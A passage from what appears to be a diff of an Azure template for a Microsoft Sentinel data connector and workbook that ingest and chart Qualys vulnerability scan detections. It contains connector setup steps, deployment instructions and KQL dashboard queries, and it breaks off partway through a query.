"name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',variables('_dataConnectorContentId1'))]", + "apiVersion": "2021-03-01-preview", + "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", + "location": "[parameters('workspace-location')]", + "kind": "GenericUI", + "properties": { + "connectorUiConfig": { + "title": "Qualys Vulnerability Management (using Azure Functions)", + "publisher": "Qualys", + "descriptionMarkdown": "The [Qualys Vulnerability Management (VM)](https://www.qualys.com/apps/vulnerability-management/) data connector provides the capability to ingest vulnerability host 
detection data into Microsoft Sentinel through the Qualys API. The connector provides visibility into host detection data from vulerability scans. This connector provides Microsoft Sentinel the capability to view dashboards, create custom alerts, and improve investigation ", + "graphQueries": [ + { + "metricName": "Total data received", + "legend": "QualysHostDetectionV2_CL", + "baseQuery": "QualysHostDetectionV2_CL" + }, + { + "metricName": "Total data received", + "legend": "QualysHostDetection_CL", + "baseQuery": "QualysHostDetection_CL" + } + ], + "dataTypes": [ + { + "name": "QualysHostDetectionV2_CL", + "lastDataReceivedQuery": "QualysHostDetectionV2_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + }, + { + "name": "QualysHostDetection_CL", + "lastDataReceivedQuery": "QualysHostDetection_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + } + ], + "connectivityCriterias": [ + { + "type": "IsConnectedQuery", + "value": [ + "QualysHostDetectionV2_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)", + "QualysHostDetection_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)" + ] + } + ], + "sampleQueries": [ + { + "description": "Top 10 Qualys V2 Vulerabilities detected", + "query": "QualysHostDetectionV2_CL\n | extend Vulnerability = tostring(QID_s)\n | summarize count() by Vulnerability\n | top 10 by count_" + }, + { + "description": "Top 10 Vulerabilities detected", + "query": "QualysHostDetection_CL\n | mv-expand todynamic(Detections_s)\n | extend Vulnerability = tostring(Detections_s.Results)\n | summarize count() by Vulnerability\n | top 10 by count_" + } + ], + "availability": { + "status": 1, + "isPreview": false + }, + "permissions": { + "resourceProvider": [ + { + "provider": "Microsoft.OperationalInsights/workspaces", + "permissionsDisplayText": "read and write permissions on the workspace are 
required.", + "providerDisplayName": "Workspace", + "scope": "Workspace", + "requiredPermissions": { + "write": true, + "read": true, + "delete": true + } + }, + { + "provider": "Microsoft.OperationalInsights/workspaces/sharedKeys", + "permissionsDisplayText": "read permissions to shared keys for the workspace are required. [See the documentation to learn more about workspace keys](https://docs.microsoft.com/azure/azure-monitor/platform/agent-windows#obtain-workspace-id-and-key).", + "providerDisplayName": "Keys", + "scope": "Workspace", + "requiredPermissions": { + "action": true + } + } + ], + "customs": [ + { + "name": "Microsoft.Web/sites permissions", + "description": "Read and write permissions to Azure Functions to create a Function App is required. [See the documentation to learn more about Azure Functions](https://docs.microsoft.com/azure/azure-functions/)." + }, + { + "name": "Qualys API Key", + "description": "A Qualys VM API username and password is required. [See the documentation to learn more about Qualys VM API](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf)." + } + ] + }, + "instructionSteps": [ + { + "description": ">**NOTE:** This connector uses Azure Functions to connect to Qualys VM to pull its logs into Microsoft Sentinel. This might result in additional data ingestion costs. Check the [Azure Functions pricing page](https://azure.microsoft.com/pricing/details/functions/) for details." + }, + { + "description": ">**(Optional Step)** Securely store workspace and API authorization key(s) or token(s) in Azure Key Vault. Azure Key Vault provides a secure mechanism to store and retrieve key values. [Follow these instructions](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) to use Azure Key Vault with an Azure Function App." + }, + { + "description": "**STEP 1 - Configuration steps for the Qualys VM API**\n\n1. 
Log into the Qualys Vulnerability Management console with an administrator account, select the **Users** tab and the **Users** subtab. \n2. Click on the **New** drop-down menu and select **Users..**\n3. Create a username and password for the API account. \n4. In the **User Roles** tab, ensure the account role is set to **Manager** and access is allowed to **GUI** and **API**\n4. Log out of the administrator account and log into the console with the new API credentials for validation, then log out of the API account. \n5. Log back into the console using an administrator account and modify the API accounts User Roles, removing access to **GUI**. \n6. Save all changes." + }, + { + "description": "**STEP 2 - Choose ONE from the following two deployment options to deploy the connector and the associated Azure Function**\n\n>**IMPORTANT:** Before deploying the Qualys VM connector, have the Workspace ID and Workspace Primary Key (can be copied from the following), as well as the Qualys VM API Authorization Key(s), readily available.", + "instructions": [ + { + "parameters": { + "fillWith": [ + "WorkspaceId" + ], + "label": "Workspace ID" + }, + "type": "CopyableLabel" + }, + { + "parameters": { + "fillWith": [ + "PrimaryKey" + ], + "label": "Primary Key" + }, + "type": "CopyableLabel" + } + ] + }, + { + "description": ">**NOTE:** This connector has been updated, if you have previously deployed an earlier version, and want to update, please delete the existing Qualys VM Azure Function before redeploying this version. Please use Qualys V2 version Workbook, detections. " + }, + { + "description": "Use this method for automated deployment of the Qualys VM connector using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2) [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://aka.ms/sentinel-QualysVM-azuredeployV2-gov)\n2. 
Select the preferred **Subscription**, **Resource Group** and **Location**. \n3. Enter the **Workspace ID**, **Workspace Key**, **API Username**, **API Password** , update the **URI**, and any additional URI **Filter Parameters** (each filter should be separated by an \"&\" symbol, no spaces.) \n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348) -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format. \n - The default **Time Interval** is set to pull the last five (5) minutes of data. If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly (in the function.json file, post deployment) to prevent overlapping data ingestion. \n> - Note: If using Azure Key Vault secrets for any of the values above, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details. \n4. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n5. Click **Purchase** to deploy.",
+ "title": "Option 1 - Azure Resource Manager (ARM) Template"
+ },
+ {
+ "description": "Use the following step-by-step instructions to deploy the Quayls VM connector manually with Azure Functions.",
+ "title": "Option 2 - Manual Deployment of Azure Functions"
+ },
+ {
+ "description": "**1. Create a Function App**\n\n1. From the Azure Portal, navigate to [Function App](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites/kind/functionapp), and select **+ Add**.\n2. In the **Basics** tab, ensure Runtime stack is set to **Powershell Core**. \n3. 
In the **Hosting** tab, ensure the **Consumption (Serverless)** plan type is selected.\n4. Make other preferrable configuration changes, if needed, then click **Create**."
+ },
+ {
+ "description": "**2. Import Function App Code**\n\n1. In the newly created Function App, select **Functions** on the left pane and click **+ New Function**.\n2. Select **Timer Trigger**.\n3. Enter a unique Function **Name** and leave the default cron schedule of every 5 minutes, then click **Create**.\n5. Click on **Code + Test** on the left pane. \n6. Copy the [Function App Code](https://aka.ms/sentinel-QualysVM-functioncodeV2) and paste into the Function App `run.ps1` editor.\n7. Click **Save**."
+ },
+ {
+ "description": "**3. Configure the Function App**\n\n1. In the Function App, select the Function App Name and select **Configuration**.\n2. In the **Application settings** tab, select **+ New application setting**.\n3. Add each of the following eight (8) application settings individually, with their respective string values (case-sensitive): \n\t\tapiUsername\n\t\tapiPassword\n\t\tworkspaceID\n\t\tworkspaceKey\n\t\turi\n\t\tfilterParameters\n\t\ttimeInterval\n\t\tlogAnalyticsUri (optional)\n> - Enter the URI that corresponds to your region. The complete list of API Server URLs can be [found here](https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf#G4.735348). The `uri` value must follow the following schema: `https:///api/2.0/fo/asset/host/vm/detection/?action=list&vm_processed_after=` -- There is no need to add a time suffix to the URI, the Function App will dynamically append the Time Value to the URI in the proper format.\n> - Add any additional filter parameters, for the `filterParameters` variable, that need to be appended to the URI. Each parameter should be seperated by an \"&\" symbol and should not include any spaces.\n> - Set the `timeInterval` (in minutes) to the value of `5` to correspond to the Timer Trigger of every `5` minutes. 
If the time interval needs to be modified, it is recommended to change the Function App Timer Trigger accordingly to prevent overlapping data ingestion.\n> - Note: If using Azure Key Vault, use the`@Microsoft.KeyVault(SecretUri={Security Identifier})`schema in place of the string values. Refer to [Key Vault references documentation](https://docs.microsoft.com/azure/app-service/app-service-key-vault-references) for further details.\n> - Use logAnalyticsUri to override the log analytics API endpoint for dedicated cloud. For example, for public cloud, leave the value empty; for Azure GovUS cloud environment, specify the value in the following format: `https://.ods.opinsights.azure.us`.\n4. Once all application settings have been entered, click **Save**."
+ },
+ {
+ "description": "**4. Configure the host.json**.\n\nDue to the potentially large amount of Qualys host detection data being ingested, it can cause the execution time to surpass the default Function App timeout of five (5) minutes. Increase the default timeout duration to the maximum of ten (10) minutes, under the Consumption Plan, to allow more time for the Function App to execute.\n\n1. In the Function App, select the Function App Name and select the **App Service Editor** blade.\n2. Click **Go** to open the editor, then select the **host.json** file under the **wwwroot** directory.\n3. Add the line `\"functionTimeout\": \"00:10:00\",` above the `managedDependancy` line \n4. 
Ensure **SAVED** appears on the top right corner of the editor, then exit the editor.\n\n> NOTE: If a longer timeout duration is required, consider upgrading to an [App Service Plan](https://docs.microsoft.com/azure/azure-functions/functions-scale#timeout)"
+ }
+ ],
+ "id": "[variables('_uiConfigId1')]"
+ }
+ }
+ },
+ {
+ "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates",
+ "apiVersion": "2023-04-01-preview",
+ "name": "[variables('workbookTemplateSpecName1')]",
+ "location": "[parameters('workspace-location')]",
+ "dependsOn": [
+ "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]"
+ ],
+ "properties": {
+ "description": "QualysVMv2 Workbook with template version 3.0.0",
+ "mainTemplate": {
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "[variables('workbookVersion1')]",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Insights/workbooks",
+ "name": "[variables('workbookContentId1')]",
+ "location": "[parameters('workspace-location')]",
+ "kind": "shared",
+ "apiVersion": "2021-08-01",
+ "metadata": {
+ "description": "Gain insight into Qualys Vulnerability Management by analyzing, collecting and correlating vulnerability data.\nThis workbook provides visibility into vulnerabilities detected from vulnerability scans"
+ },
+ "properties": {
+ "displayName": "[parameters('workbook1-name')]",
+ "serializedData": "{\"version\":\"Notebook/1.0\",\"items\":[{\"type\":9,\"content\":{\"version\":\"KqlParameterItem/1.0\",\"parameters\":[{\"id\":\"1694c013-fbeb-43eb-89c7-1417bb59150f\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"TimeRange\",\"label\":\"Time 
Range\",\"type\":4,\"value\":{\"durationMs\":2419200000},\"typeSettings\":{\"selectableValues\":[{\"durationMs\":300000},{\"durationMs\":900000},{\"durationMs\":1800000},{\"durationMs\":3600000},{\"durationMs\":14400000},{\"durationMs\":43200000},{\"durationMs\":86400000},{\"durationMs\":172800000},{\"durationMs\":259200000},{\"durationMs\":604800000},{\"durationMs\":1209600000},{\"durationMs\":2419200000},{\"durationMs\":2592000000},{\"durationMs\":5184000000},{\"durationMs\":7776000000}],\"allowCustom\":true},\"resourceType\":\"microsoft.insights/components\"},{\"id\":\"a9cc502e-223d-4067-834b-a34a85055664\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"severitySelector\",\"label\":\"Severity\",\"type\":2,\"isRequired\":true,\"multiSelect\":true,\"quote\":\"'\",\"delimiter\":\",\",\"query\":\"QualysHostDetectionV2_CL\\r\\n| extend Sev = tostring(Severity_s)\\r\\n| distinct Sev\\r\\n| sort by Sev desc\",\"value\":[\"value::all\"],\"typeSettings\":{\"additionalResourceOptions\":[\"value::all\"]},\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"},{\"id\":\"364f8236-9b9d-4e41-9767-ab5f404dcd4e\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"OperatingSystem\",\"label\":\"Operating System\",\"type\":2,\"isRequired\":true,\"multiSelect\":true,\"quote\":\"'\",\"delimiter\":\",\",\"query\":\"QualysHostDetectionV2_CL\\r\\n| distinct OperatingSystem_s\",\"value\":[\"value::all\"],\"typeSettings\":{\"additionalResourceOptions\":[\"value::all\"]},\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"}],\"style\":\"above\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"},\"name\":\"parameters - 
2\"},{\"type\":11,\"content\":{\"version\":\"LinkItem/1.0\",\"style\":\"tabs\",\"links\":[{\"cellValue\":\"selectedTab\",\"linkTarget\":\"parameter\",\"linkLabel\":\"Scan Detection\",\"subTarget\":\"Detection\",\"preText\":\"ScanDetectio\",\"style\":\"link\"},{\"cellValue\":\"selectedTab\",\"linkTarget\":\"parameter\",\"linkLabel\":\"Vulnerability Analysis\",\"subTarget\":\"VulnerabilityAnalysis\",\"style\":\"link\"}]},\"name\":\"links - 5\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| where isnotempty(Sev)\\n| summarize ['5 - Urgent'] = countif(Sev == \\\"5\\\"), ['4 - Critical'] = countif(Sev == \\\"4\\\"), ['3 - Serious'] = countif(Sev == \\\"3\\\"), ['2 - Medium'] = countif(Sev == \\\"2\\\"), ['1 - Minimal'] = countif(Sev == \\\"1\\\"), count() by bin(TimeGenerated, {TimeRange:grain})\\n| project-away count_\\n\\n\",\"size\":0,\"title\":\"Detections by Severity Timeline\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"barchart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - 
Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"name\":\"query - 2 \"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where 
OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Status = tostring(Status_s)\\n| summarize count() by Status\\n\\n\",\"size\":0,\"title\":\"Detection Status\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"piechart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - 
Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| extend Status = tostring(Status_s)\\n| where Status == \\\"Re-Opened\\\"\\n| summarize count() by Sev, Severity, Vulnerability ;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nlet topSerious = data\\n| where Sev == \\\"3\\\"\\n| top 10 by count_;\\nlet topMedium = data\\n| where Sev == \\\"2\\\"\\n| top 10 by count_;\\nlet topMinimal = data\\n| where Sev == \\\"1\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical, topSerious, topMedium, topMinimal\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename 
Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Re-Opened Vulnerabilities by Severity\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = 
tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| extend Status = tostring(Status_s)\\n| where Status == \\\"New\\\" and Sev in (\\\"5\\\", \\\"4\\\")\\n| summarize count() by Sev, Severity, IPAddress, DnsName_s;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Host with New Urgent/Critical Vulnerabilities\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - 
Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| extend Status = tostring(Status_s)\\n| where Status == \\\"Re-Opened\\\" and Sev in (\\\"5\\\", \\\"4\\\")\\n| summarize count() by Sev, Severity, IPAddress, DnsName_s;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Host with Re-Opened Urgent/Critical 
Vulnerabilities\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where isnotempty(Sev)\\n| summarize ['5 - Urgent'] = countif(Sev == \\\"5\\\"), ['4 - Critical'] = countif(Sev == \\\"4\\\"), ['3 - Serious'] = countif(Sev == \\\"3\\\"), ['2 - Medium'] = countif(Sev == \\\"2\\\"), ['1 - Minimal'] = countif(Sev 
